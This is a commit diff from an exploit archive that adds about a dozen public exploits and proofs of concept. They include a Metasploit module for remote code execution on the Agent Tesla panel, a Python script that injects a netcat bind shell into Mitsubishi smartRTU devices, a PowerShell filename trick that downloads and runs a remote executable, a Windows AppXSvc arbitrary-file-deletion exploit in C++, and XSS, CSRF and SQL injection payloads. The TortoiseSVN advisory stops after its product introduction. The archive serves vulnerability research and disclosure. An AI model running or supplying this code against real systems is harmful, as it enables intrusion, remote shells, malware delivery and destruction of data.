DB: 2019-08-15

12 changes to exploits/shellcodes Windows PowerShell - Unsanitized Filename Command Execution ABC2MTEX 1.6.1 - Command Line Stack Overflow Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion Agent Tesla Botnet - Arbitrary Code Execution (Metasploit) Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated Configuration Download Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell SugarCRM Enterprise 9.0.0 - Cross-Site Scripting Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'customfields.php' SQL Injection D-Link DIR-600M - Authentication Bypass (Metasploit) WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery TortoiseSVN 1.12.1 - Remote Code Execution ManageEngine opManager 12.3.150 - Authenticated Code Execution
2019-08-15 05:02:48 +00:00 · 2019-08-15 05:02:48 +00:00 · 7e6884af13
commit 7e6884af13
parent 998fb1eeec
13 changed files with 1303 additions and 0 deletions
--- a/exploits/hardware/webapps/47250.rb
+++ b/exploits/hardware/webapps/47250.rb
@ -0,0 +1,62 @@
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'CVE-2019-13101 D-Link DIR-600M Incorrect Access Control',
      'Description'     => %q{
          This module attempts to find D-Link router DIR-600M which is
 vulnerable to Incorrect Access Control. The vulnerability exists in
        wan.htm, which is accessible without authentication. This
 vulnerabilty can lead an attacker to manipulate WAN settings.
        This module has been tested successfully on Firmware Version
 3.01,3.02,3.03,3.04,3.05,3.06.
      },
      'Author'          => [ 'Devendra Singh Solanki <devendra0x0[at]gmail.com>' ],
      'License'         => MSF_LICENSE,
      'References'      =>
        [
          'CVE', '2019-13101'
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 08 2019'))
    register_options(
      [
        Opt::RPORT(80)
      ])
  end
  def run_host(ip)
    res = send_request_cgi({'uri' => '/login.htm'})
    if res.nil? or res.code == 404
      print_error("#{rhost}:#{rport} - Host is down.")
      return
    end
    if res and res.code == 200 and res.body =~ /D-Link/
      print_good("#{rhost}:#{rport} - It is a D-Link router")
    else
      print_error("#{rhost}:#{rport} - Not a D-Link router")
      return
    end
    res = send_request_cgi({'uri' => '/wan.htm'})
    if res and res.code == 200 and res.body =~ /PPPoE/
      print_good("#{rhost}:#{rport} - Router is vulnerable for
 Incorrect Access Control. CVE-2019-13101")
    else
      print_error("#{rhost}:#{rport} - Router is with different firmware.")
      return
    end
  end
 end
--- a/exploits/linux/dos/47254.txt
+++ b/exploits/linux/dos/47254.txt
@ -0,0 +1,64 @@
 Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow
 Date: 2019-08-13
 Exploit Author: Carter Yagemann <yagemann@gatech.edu>
 Vendor Homepage: https://abcnotation.com/abc2mtex/
 Software Link: https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
 Version: 1.6.1
 Tested on: Debian Buster
 An unsafe strcpy at abc.c:241 allows an attacker to overwrite the return
 address from the openIn function by providing a long input filename. This
 carries similar risk to CVE-2004-1257.
 Setup:
 $ wget https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
 $ tar -xzf abc2mtex1.6.1.tar.gz
 $ make
 $ gcc --version
 gcc (Debian 8.3.0-6) 8.3.0
 Copyright (C) 2018 Free Software Foundation, Inc.
 This is free software; see the source for copying conditions.  There is NO
 warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
 PoC:
 $ ./abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA
 GDB:
 We're going to place a breakpoint before and after abc.c:241 to show the overflow.
 $ gdb -q ./abc2mtex
 Reading symbols from ./abc2mtex...done.
 (gdb) break abc.c:241
 Breakpoint 1 at 0x4139: file abc.c, line 241.
 (gdb) break abc.c:242
 Breakpoint 2 at 0x414c: file abc.c, line 242.
 (gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA
 Starting program: /tmp/tmp.4jy8nhwOI3/abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA
 Breakpoint 1, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241
 241                     (void) strcpy(savename,filename);
 (gdb) bt
 #0  openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241
 #1  0x0000555555556f00 in main (argc=2, argv=0x7fffffffe4f8) at fields.c:273
 (gdb) c
 Continuing.
 Breakpoint 2, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242
 242                     (void) strcat(filename,".abc");
 (gdb) bt
 #0  openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242
 #1  0x0000414243444546 in ?? ()
 #2  0x00007fffffffe4f8 in ?? ()
 #3  0x0000000200000000 in ?? ()
 #4  0x0000000000000000 in ?? ()
 (gdb) c
 Continuing.
 file "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA" does not exist
 Program received signal SIGSEGV, Segmentation fault.
 0x0000414243444546 in ?? ()
 (gdb) quit
--- a/exploits/php/remote/47256.rb
+++ b/exploits/php/remote/47256.rb
@ -0,0 +1,106 @@
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Tesla Agent Remote Code Execution",
      'Description'    => %q{
        This module exploits the command injection vulnerability of tesla agent botnet panel.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Ege Balcı <ege.balci@invictuseurope.com>' # author & msf module
        ],
      'References'     =>
        [
          ['URL', 'https://prodaft.com']
        ],
      'DefaultOptions'  =>
        {
          'SSL' => false,
          'WfsDelay' => 5,
        },
      'Platform'       => ['php'],
      'Arch'           => [ ARCH_PHP ],
      'Targets'        =>
      [
        ['PHP payload',
          {
            'Platform' => 'PHP',
            'Arch' => ARCH_PHP,
            'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
          }
        ]
      ],
      'Privileged'     => false,
      'DisclosureDate' => "July 10 2018",
      'DefaultTarget'  => 0
    ))
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the tesla agent with panel path', '/WebPanel/']),
      ]
    )
  end
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/server_side/scripts/server_processing.php'),
    )
    #print_status(res.body)
    if res && res.body.include?('SQLSTATE')
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end
  def exploit
    check
    name = '.'+Rex::Text.rand_text_alpha(4)+'.php'
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path,'/server_side/scripts/server_processing.php'),
      'encode_params' => true,
      'vars_get'  => {
        'table'  => 'passwords',
        'primary'  => 'password_id',
        'clmns'  => 'a:1:{i:0;a:3:{s:2:"db";s:3:"pwd";s:2:"dt";s:8:"username";s:9:"formatter";s:4:"exec";}}',
        'where'  => Rex::Text.encode_base64("1=1 UNION SELECT \"echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d > #{name}\"")
      }
    )
    if res && res.code == 200 && res.body.include?('recordsTotal')
      print_good("Payload uploaded as #{name}")  
    else
      print_error('Payload upload failed :(')
      Msf::Exploit::Failed
    end
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path,'/server_side/scripts/',name)}, 5
    )
    if res && res.code == 200
      print_good("Payload successfully triggered !")  
    else
      print_error('Payload trigger failed :(')
      Msf::Exploit::Failed
    end
  end
 end
--- a/exploits/php/webapps/47234.py
+++ b/exploits/php/webapps/47234.py
@ -0,0 +1,38 @@
 #!/usr/bin/python
 # Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated Configuration Download
 # Date: 29 June 2019 
 # Exploit Author: (@xerubus | mogozobo.com)
 # Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local
 # Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/
 # Firmware Version: Misubishi Electric 2.02 & INEA 3.0
 # CVE-ID: CVE-2019-14927
 # Full write-up: https://www.mogozobo.com/?p=3593
 import sys, os, requests, socket
 os.system('clear')
 print("""\
        _  _
  ___ (~ )( ~)
 /   \_\ \/ /   
 |   D_ ]\ \/  -= Conf_Me-smartRTU  by @xerubus =-    
 |   D _]/\ \  -= We all have something to hide =-
 \___/ / /\ \\
      (_ )( _)
      @Xerubus    
                    """)
 host = raw_input("Enter RTU IP address: ")
 php_page = '/saveSettings.php'
 url = "http://{}{}".format(host, php_page)
 print "[+] Attempting to download smartRTU configuration file"
 r = requests.get(url)
 if r.status_code == 200:
   print "[+] Successfully obtained smartRTU configuration file.. saving to smartRTU_conf.xml\n"
   with open('smartRTU_conf.xml', 'w') as f:
      f.write(r.content)
--- a/exploits/php/webapps/47235.py
+++ b/exploits/php/webapps/47235.py
@ -0,0 +1,69 @@
 #!/usr/bin/python
 # Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated OS Command Injection
 # Date: 29 June 2019 
 # Exploit Author: (@xerubus | mogozobo.com)
 # Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local
 # Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/
 # Firmware Version: Misubishi Electric 2.02 & INEA 3.0 
 # CVE-ID: CVE-2019-14931
 # Full write-up: https://www.mogozobo.com/?p=3593
 import sys, os, requests, socket
 os.system('clear')
 print("""\
        _  _
  ___ (~ )( ~)
 /   \_\ \/ /   
 |   D_ ]\ \/  -= Bind_Me-smartRTU  by @xerubus =-    
 |   D _]/\ \  -= We all have something to hide =-
 \___/ / /\ \\
      (_ )( _)
      @Xerubus    
                    """)
 host = raw_input("Enter RTU IP address: ")
 port = raw_input("Enter bind shell port number: ")
 php_page = '/action.php'
 url = "http://{}{}".format(host, php_page)
 payload = {'host' : ';sudo /usr/sbin/service ../../bin/nc -nvlp '+port+' -e /bin/sh&PingCheck=Test'}
 print "\n[+] Building payload"
 print "[+] Sending payload"
 print "[+] Attempting connection to smartRTU"
 try:
   r = requests.post(url, data=payload, timeout=1)
 except:
   pass
 port = (int(port))
 try:
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect((host, port))
   try :  
      print "[+] Connected to the smartRTU!\n"
      while 1:  
         cmd = raw_input("(smartRTU-shell) # ");  
         s.send(cmd + "\n");  
         result = s.recv(1024).strip();  
         if not len(result) :  
            print "\n[!] Play nice now skiddies....\n\n"
            s.close();  
            break;  
         print(result);  
   except KeyboardInterrupt:
      print "\n[+] ^C Received, closing connection"
      s.close();
   except EOFError:
      print "\n[+] ^D Received, closing connection"
      s.close();
 except socket.error:
   print "[!] Failed to connect to bind shell."
--- a/exploits/php/webapps/47247.txt
+++ b/exploits/php/webapps/47247.txt
@ -0,0 +1,30 @@
 # Exploit Title: 0Day UnauthenticatedXSS SugarCRM Enterprise
 # Google Dork: N/A
 # Date: 11.08.2019
 # Exploit Author: Ilca Lucian Florin
 # Vendor Homepage: https://www.sugarcrm.com
 # Version: 9.0.0
 # Tested on: Windows 7 / Internet Explorer 11 / Google Chrome 76
 # CVE : 2019-14974
 The application fails to sanitize user input on https://sugarcrm-qms.XXX.com/mobile/error-not-supported-platform.html and reflect the input directly in the HTTP response, allowing the hacker to exploit the vulnerable parameter and have malicious content executed in the victim's browser.
 Steps to reproduce:
 1.Attacker will craft a malicious payload and create a legitimate link with the payload included;
 2. Attacker will send the link to the victim;
 3. Upon clicking on the link, the malicious payload will be reflected in the response and executed in the victim’s browser.
 The behavior can be observed by visiting the following URL:
 https://server/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(document.cookie);//itms://
 Clicking on FULL VERSION OF WEBSITE will trigger the XSS.
 Impact statement:
 Although requiring user interaction, reflected XSS impact might range from web defacement to stealing user info and full account takeover, depending on the circumstances.
 Recommendation:
 Always ensure to validate parameters input and encode the output.
--- a/exploits/php/webapps/47249.txt
+++ b/exploits/php/webapps/47249.txt
@ -0,0 +1,23 @@
 #Exploit Title: Joomla! component com_jsjobs - 'customfields.php' SQL Injection
 #Dork: inurl:"index.php?option=com_jsjobs"
 #Date: 13.08.19
 #Exploit Author: qw3rTyTy
 #Vendor Homepage: https://www.joomsky.com/
 #Software Link: https://www.joomsky.com/5/download/1
 #Version: 1.2.5
 #Tested on: Debian/nginx/joomla 3.9.0
 #####################################
 #Vulnerability details:
 #####################################
 Vulnerable code is in line 171 in file site/models/customfields.php
   169	    function dataForDepandantField( $val , $childfield){ 
   170	        $db = $this->getDBO();
   171	        $query = "SELECT userfieldparams,fieldtitle FROM `#__js_job_fieldsordering` WHERE field = '".$childfield."'";	//!!!
   172	        $db->setQuery($query);
   173	        $data = $db->loadObject();
 #####################################
 #PoC:
 #####################################
 $> sqlmap.py -u "http://localhost/index.php?option=com_jsjobs&task=customfields.datafordepandantfield&fvalue=0&child=0" --random-agent --dbms=mysql --method GET -p child --technique E
--- a/exploits/php/webapps/47251.txt
+++ b/exploits/php/webapps/47251.txt
@ -0,0 +1,51 @@
 # Exploit Title: CSRF vulnerabilities in WordPress Download Manager Plugin 2.5
 # Google Dork: inurl:"/wp-content/plugins/download-manager
 # Date: 24 may, 2019
 # Exploit Author: Princy Edward
 # Exploit Author Blog : https://prinyedward.blogspot.com/
 # Vendor Homepage: https://www.wpdownloadmanager.com/
 # Software Link: https://wordpress.org/plugins/download-manager/
 # Tested on: Apache/2.2.24 (CentOS)
 POC 
 #1 
 There is no CSRF nonce check performed in "POST
 /wp-admin/admin-ajax.php?action=wpdm_save_email_setting" request. 
 #Code
 <form method="POST"
 action="http://localhost/wp-admin/admin-ajax.php?action=wpdm_save_email_setting">
 <input type="hidden" name="__wpdm_email_template" value="default.html">
 <input type="hidden" name="__wpdm_email_setting[logo]"
 value="https://hacker.jpg">
 <input type="hidden" name="__wpdm_email_setting[banner]"
 value="https://hacker.jpg">
 <input type="hidden" name="__wpdm_email_setting[footer_text]"
 value="https://malicious-url.com"><input type="hidden" name="__wpdm_email_setting[facebook]"
 value="https://malicious-url.com">
 <input type="hidden" name="__wpdm_email_setting[twitter]" value="https://malicious-url.com">
 <input type="hidden" name="__wpdm_email_setting[youtube]"
 value="https://malicious-url.com">
 <input type="submit">
 </form>
 #2
 There is no CSRF nonce check performed in "POST
 /wp-admin/edit.php?post_type=wpdmpro&page=templates&_type=email&task=EditEmailTemplat
 e&id=default" request.
 #Code
 <form method="POST"
 action="http://localhost/wp-admin/edit.php?post_type=wpdmpro&page=templates&_type=email&
 task=EditEmailTemplate&id=default">
 <input type="hidden" name="id" value="default">
 <input type="hidden" name="email_template[subject]" value="forget password">
 <input type="hidden" name="email_template[message]" value="aaa">
 <input type="hidden" name="email_template[from_name]" value="hacker">
 <input type="hidden" name="email_template[from_email]" value="hacker@hacker.com">
 <input type="submit">
 </form>
--- a/exploits/windows/dos/47248.py
+++ b/exploits/windows/dos/47248.py
@ -0,0 +1,144 @@
 '''
 [+] Credits: John Page (aka hyp3rlinx)		
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt
 [+] ISR: Apparition Security          
 [Vendor]
 www.microsoft.com
 [Product]
 Windows PowerShell
 Windows PowerShell is a Windows command-line shell designed especially for system administrators.
 PowerShell includes an interactive prompt and a scripting environment that can be used independently or in combination.
 [Vulnerability Type]
 Unsanitized Filename Command Execution
 [CVE Reference]
 N/A
 [Security Issue]
 PowerShell can potentially execute arbitrary code when running specially named scripts due to trusting unsanitized filenames.
 This occurs when ".ps1" files contain semicolons ";" or spaces as part of the filename, causing the execution of a different trojan file;
 or the running of unexpected commands straight from the filename itself without the need for a second file.
 For trojan files it doesn't need to be another PowerShell script and can be one of the following ".com, .exe, .bat, .cpl, .js, .vbs and .wsf.
 Therefore, the vulnerably named file ".\Hello;World.ps1" will instead execute "hello.exe", if that script is invoked using the standard
 Windows shell "cmd.exe" and "hello.exe" resides in the same directory as the vulnerably named script.
 However, when such scripts are run from PowerShells shell and not "cmd.exe" the "&" (call operator) will block our exploit from working.
 Still, if the has user enabled ".ps1" scripts to open with PowerShell as its default program, all it takes is double click the file to trigger 
 the exploit and the "& call operator" will no longer save you. Also, if the user has not enabled PowerShell to open .ps1 scripts
 as default; then running the script from cmd.exe like: c:\>powershell "\Hello;World.ps1" will also work without dropping into the PowerShell shell.
 My PoC will download a remote executable save it to the victims machine and then execute it, and the PS files contents are irrelevant.
 Also, note I use "%CD" to target the current working directory where the vicitm has initially opened it, after it calls "iwr" (invoke-webrequest)
 abbreviated for space then it sleeps for 2 seconds and finally executes.
 C:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))
 This can undermine the integrity of PowerShell as it potentially allows unexpected code execution; even when the scripts contents are visually reviewed.
 We may also be able to bypass some endpoint protection or IDS systems that may look at the contents or header of a file but not its filename where are
 commands can be stored.
 For this to work the user must have enabled PowerShell as its default program when opening ".ps1" files.
 First, we create a Base64 encoded filename for obfuscation; that will download and execute a remote executable named in this case "n.exe".
 c:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))
 Give the PS script a normal begining name, then separate commands using ";" semicolon e.g.
 Test;powershell -e <BASE64 ENCODED COMMANDS>;2.ps1
 Create the executable without a file extension to save space for the filename then save it back using the -O parameter.
 The "-e" is abbreviated for EncodedCommand to again save filename space.
 Host the executable on web-server or just use python -m SimpleHTTPServer 80 or whatever.
 Double click to open in PowerShell watch the file get downloaded saved and executed!
 My example is used as a "filename embedded downloader", but obviously we can just call other secondary trojan files of various types in the same directory.
 Note: User interaction is required, and obviously running any random PS script is dangerous... but hey we looked at the file content and it simply printed a string!
 [Exploit / PoC]
 '''
 from base64 import b64encode
 import argparse,sys
 #Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC
 #Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename.
 #Expects hostname/ip-addr of web-server housing the exploit.
 #By hyp3rlinx
 #Apparition Security
 #====================
 def parse_args():
    parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.")
    parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.")
    parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.")
    return parser.parse_args()
 def main(args):
    PSEmbedFilenameMalwr=""
    if args.ipaddress:
        PSEmbedFilenameMalwr = "powershell iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O %CD%\\"+args.local_malware_name+" ;sleep -s 2;start "+args.local_malware_name
    return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE'))
 def create_file(payload):
    f=open("Test;PowerShell -e "+payload+";2.ps1", "w")
    f.write("Write-Output 'Have a nice day!'")
    f.close()
 if __name__=="__main__":
    parser = argparse.ArgumentParser()
    PSCmds = main(parse_args())
    if len(sys.argv)==1:
        parser.print_help(sys.stderr)
        sys.exit(1)
    create_file(PSCmds)
    print "PowerShell - Unsantized Filename Command Execution File created!"
    print "By hyp3rlinx"
 '''
 [POC Video URL]
 https://www.youtube.com/watch?v=AH33RW9g8J4
 [Network Access]
 Remote
 [Severity]
 High
 [Disclosure Timeline]
 Vendor Notification: July 20, 2019
 MSRC "does not meet the bar for security servicing" : July 23, 2019
 August 1, 2019 : Public Disclosure
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
 or exploits by the author or elsewhere. All content (c).
 '''
 hyp3rlinx
--- a/exploits/windows/local/47253.cpp
+++ b/exploits/windows/local/47253.cpp
@ -0,0 +1,244 @@
 /*
 # Author : Abdelhamid Naceri
 # Discovered On : 13/08/2019
 # Description : An Elevation Of Privileges Exist when the microsoft AppXSvc
 Deployment Service Cannot Properly Handle The Folder Junction lead to an arbitrary file deletion
 from a low integrity user .
 # Still Unpatched On 13/08/2019
 Here Is A Demo Video https://youtu.be/jqYwMcNvTtM
 */
 #include"windows.h"
 #include"iostream"
 #include"conio.h"
 #include"stdio.h"
 #include"tlhelp32.h"
 #include"cstdio"
 #include"wchar.h"
 #include"process.h"
 #include"wchar.h"
 #include"string"
 #include"tchar.h"
 #pragma warning(disable : 4996)
 #pragma comment(lib, "advapi32.lib")
 #ifndef UNICODE  
 typedef std::string String;
 #else
 typedef std::wstring String;
 #endif
 using namespace std;
 bool FileExists(const wchar_t* file) {
 	if (INVALID_FILE_ATTRIBUTES == GetFileAttributes(file) && GetLastError() == ERROR_FILE_NOT_FOUND)
 	{
 		return false;
 	}
 	else {
 		return true;
 	}
 }
 void remove_dir(const wchar_t* folder)
 {
 	std::wstring search_path = std::wstring(folder) + _T("/*.*");
 	std::wstring s_p = std::wstring(folder) + _T("/");
 	WIN32_FIND_DATA fd;
 	HANDLE hFind = ::FindFirstFile(search_path.c_str(), &fd);
 	if (hFind != INVALID_HANDLE_VALUE) {
 		do {
 			if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
 				if (wcscmp(fd.cFileName, _T(".")) != 0 && wcscmp(fd.cFileName, _T("..")) != 0)
 				{
 					remove_dir((wchar_t*)(s_p + fd.cFileName).c_str());
 				}
 			}
 			else {
 				DeleteFile((s_p + fd.cFileName).c_str());
 			}
 		} while (::FindNextFile(hFind, &fd));
 		::FindClose(hFind);
 		_wrmdir(folder);
 	}
 }
 void killProcessByName(const wchar_t* filename)
 {
 	HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, NULL);
 	PROCESSENTRY32 pEntry;
 	pEntry.dwSize = sizeof(pEntry);
 	BOOL hRes = Process32First(hSnapShot, &pEntry);
 	while (hRes)
 	{
 		if (wcscmp(pEntry.szExeFile, filename) == 0)
 		{
 			HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, 0,
 				(DWORD)pEntry.th32ProcessID);
 			if (hProcess != NULL)
 			{
 				TerminateProcess(hProcess, 9);
 				CloseHandle(hProcess);
 			}
 		}
 		hRes = Process32Next(hSnapShot, &pEntry);
 	}
 	CloseHandle(hSnapShot);
 }
 bool IsProcessRunning(const wchar_t* processName)
 {
 	bool exists = false;
 	PROCESSENTRY32 entry;
 	entry.dwSize = sizeof(PROCESSENTRY32);
 	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
 	if (Process32First(snapshot, &entry))
 		while (Process32Next(snapshot, &entry))
 			if (!_wcsicmp(entry.szExeFile, processName))
 				exists = true;
 	CloseHandle(snapshot);
 	return exists;
 }
 bool dirExists(const std::string& dirName_in)
 {
 	DWORD ftyp = GetFileAttributesA(dirName_in.c_str());
 	if (ftyp == INVALID_FILE_ATTRIBUTES)
 		return false;
 	if (ftyp & FILE_ATTRIBUTE_DIRECTORY)
 		return true;
 	return false;
 }
 void KillEdge()
 {
 	killProcessByName(L"MicrosoftEdge.exe");
 }
 void StartEdge() 
 {
 	try
 	{
 		system("start microsoft-edge:");
 	}
 	catch (...){}
 }
 void exploit(const char* path) {
 	//Inintializing the variable before begining
 	int attempt = 0;
 	string command;
 	wchar_t* userprofile = _wgetenv(L"USERPROFILE");
 	const wchar_t* relpath = (L"\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe");
 	//I created roaming path variable because sometime when i try to wipe ms-edge folder he deny the access so as a solution
 	//I deleted him first
 	const wchar_t* roamingpath = (L"\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\RoamingState");
 	wstring froamingpath(userprofile);
 	froamingpath += wstring(roamingpath);
 	wstring fullpath(userprofile);
 	fullpath += std::wstring(relpath);
 	wchar_t* szBuffsrc = (wchar_t*)fullpath.c_str();
 	wstring fpath(szBuffsrc);
 	string strfpath(fpath.begin(), fpath.end());
 	//Check If MS-Edge Need To Write DACL Or Not
 	if (dirExists(strfpath) != true) { 
 		printf("[!] Wait MS-Edge Need To Write The DACL");
 		StartEdge();
 		for (;;) {
 			Sleep(1000);
 			if (IsProcessRunning(L"MicrosoftEdge.exe") == true) { break; }
 		}
 		StartEdge();
 		Sleep(7000);
 		KillEdge();
 		printf("\r                                      ");
 	}
 	//End Of Check
 	printf("\r# Author : Abdelhamid Naceri\n");
 	printf("# Tested On Windows 10 32&64bit\n");
 	printf("# Description : A Vulnerabilitie Exist On Microsoft AppXSvc Deployement Service (\"wsappx\") Could Allow An Attacker To Arbitratry Delete Any File Exist On A Windows Machine\n");
 	printf("[+] Checking If Path Exist ...");
 	Sleep(2000);
 	if (dirExists(path) != true) { 
 		printf("Your Path Is Invalid"); 
 		ExitProcess(EXIT_FAILURE); }
 	else { 
 		printf("Exist !\n");
 		KillEdge();
 		printf("[+] Starting MS-Edge ...\n");
 		StartEdge();
 		Sleep(4000);
 		printf("[+] Killing MS-Edge ...\n");
 		KillEdge();
 		Sleep(3000);
 		printf("[+] Wipping MS-Edge Directory ...\n");
 		killProcessByName(L"dllhost.exe");//I Kill This Process Because Somethime He Lock The Files
 		remove_dir(roamingpath);
 		remove_dir(szBuffsrc);
 		Sleep(2000);
 		remove_dir(szBuffsrc);
 		printf("[+] Checking If Directory Exist Anymore ...");
 		if (dirExists(strfpath) == true) {
 			if (dirExists(strfpath) == true) {
 				printf("Something Went Wrong");
 				printf("\n[!] You Should Delete The Files YourSelf Press Anything To Continue");
 				command = "explorer ";
 				command.append(strfpath);
 				system(command.c_str());
 				_getch();
 				goto Continue;
 			}
 		}
 		else {
 Continue:
 			printf(" Done\n");
 			Sleep(3000);
 			printf("[+] Attempting to Create Junction To Target ...\n");
 			command = "mklink /J ";
 			command.append("\"");
 			command.append(strfpath);
 			command.append("\"");
 			command.append(" ");
 			command.append("\"");
 			command.append(path);
 			command.append("\"");
 			system(command.c_str());
 			printf("Done\n");
 			Sleep(3000);
 			printf("[+] Firing Up MS-Edge Again ...\n");
 			StartEdge();
 			do { Sleep(1000);  } while (IsProcessRunning(L"MicrosoftEdge.exe"));
 			Sleep(3000);
 			StartEdge();
 			command = "explorer ";
 			command.append(path);
 			printf("[!] If The Exploit Done , MS AppXSvc Will Wipe The Target Path\n");
 			system(command.c_str());
 			printf("[!] We Will Open Explorer In The Target Check Your Files If The File Deleted Press Anything To Clear The Exploit Files...\n");
 			_getch();
 			printf("Cleaning ...");
 			_wremove(szBuffsrc);
 			_wrmdir(szBuffsrc);
 			ExitProcess(EXIT_SUCCESS);
 		}
 	}
 }
 int main(int argc, char* argv[]) {
 	if (argc == 2) {exploit(argv[1]);}
 	else { 
 		printf("# Author : Abdelhamid Naceri\n");
 		printf("# Tested On Windows 10 1903 32&64bit\n");
 		printf("# Description : A Vulnerabilitie Exist On Microsoft AppXSvc Deployement Service (\"wsappx\") Could Allow An Attacker To Arbitratry Delete Any File Exist On A Windows Machine\n");
 		printf("[!] Usage : poc.exe TargetPath");
 	}
 	return EXIT_SUCCESS;
 }
--- a/exploits/windows/webapps/47252.txt
+++ b/exploits/windows/webapps/47252.txt
@ -0,0 +1,194 @@
 Document Title:
 ===============
 TortoiseSVN v1.12.1 - Remote Code Execution Vulnerability
 References (Source):
 ====================
 https://www.vulnerability-lab.com/get_content.php?id=2188
 Product:
 https://osdn.net/projects/tortoisesvn/storage/1.12.1/Application/TortoiseSVN-1.12.1.28628-x64-svn-1.12.2.msi/
 Ticket: https://groups.google.com/forum/#!forum/tortoisesvn
 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14422
 CVE-ID:
 =======
 CVE-2019-14422
 Release Date:
 =============
 2019-08-13
 Vulnerability Laboratory ID (VL-ID):
 ====================================
 2188
 Common Vulnerability Scoring System:
 ====================================
 8.8
 Vulnerability Class:
 ====================
 Code Execution
 Current Estimated Price:
 ========================
 4.000€ - 5.000€
 Product & Service Introduction:
 ===============================
 TortoiseSVN is a really easy to use Revision control / version control /
 source control software for Windows.
